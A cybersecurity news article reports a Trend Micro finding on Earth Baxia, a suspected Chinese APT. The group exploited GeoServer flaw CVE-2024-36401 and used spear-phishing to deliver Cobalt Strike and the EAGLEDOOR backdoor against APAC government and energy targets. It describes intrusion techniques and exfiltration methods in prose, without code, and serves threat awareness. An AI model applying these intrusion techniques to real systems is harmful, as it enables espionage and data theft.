Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware

A suspected advanced persistent threat (APT) originating from China targeted a government entity in Taiwan, and perhaps other nations in the Asia-Pacific (APAC) region, by exploiting a newly fixed serious security weakness affecting OSGeo GeoServer GeoTools.

The intrusion activity, which was spotted by Trend Micro in July 2024, has been traced to a threat actor named Earth Baxia.

"Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand," researchers Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, and Philip Chen said.

The finding of lure papers in Simplified Chinese alludes to China being one of the afflicted nations as well, however the cybersecurity firm stated it does not have enough evidence to tell what industries inside the country have been targeted out.

The multi-stage infection chain process leverages two different techniques, using spear-phishing emails and the exploitation of the GeoServer flaw (CVE-2024-36401, CVSS score: 9.8), to ultimately deliver Cobalt Strike and a previously unknown backdoor codenamed EAGLEDOOR, which allows for information gathering and payload delivery.

"The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim's guard," the researchers noted, adding the former method is used to download next-stage malware via a decoy MSC file dubbed RIPCOY embedded within a ZIP archive attachment.

It's worth adding here that Japanese cybersecurity firm NTT Security Holdings recently outlined an activity cluster with ties to APT41 that it claimed employed the same two approaches to target Taiwan, the Philippines military, and Vietnamese energy companies.

It's likely that these two intrusion sets are related, given the overlapping use of Cobalt Strike command-and-control (C2) domains that mimic Amazon Web Services, Microsoft Azure (e.g., "s3cloud-azure," "s2cloud-amazon," "s3bucket-azure," and "s3cloud-azure"), and Trend Micro itself ("trendmicrotech").

The eventual purpose of the assaults is to install a bespoke copy of Cobalt Strike, which functions as a launchpad for the EAGLEDOOR backdoor ("Eagle.dll") via DLL side-loading.

The virus supports four ways to connect with the C2 server via DNS, HTTP, TCP, and Telegram. While the first three protocols are utilized to relay the victim status, the fundamental functionality is accomplished using the Telegram Bot API to upload and receive files, and execute additional payloads. The captured data is exfiltrated using curl.exe.

"Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries," the researchers pointed out.

"They employed sophisticated tactics including GeoServer exploitation, spear-phishing, and bespoke malware (Cobalt Strike and EAGLEDOOR) to penetrate and exfiltrate data. The usage of public cloud services for storing malicious files and the multi-protocol support of EAGLEDOOR illustrate the intricacy and flexibility of their activities."

Post a Comment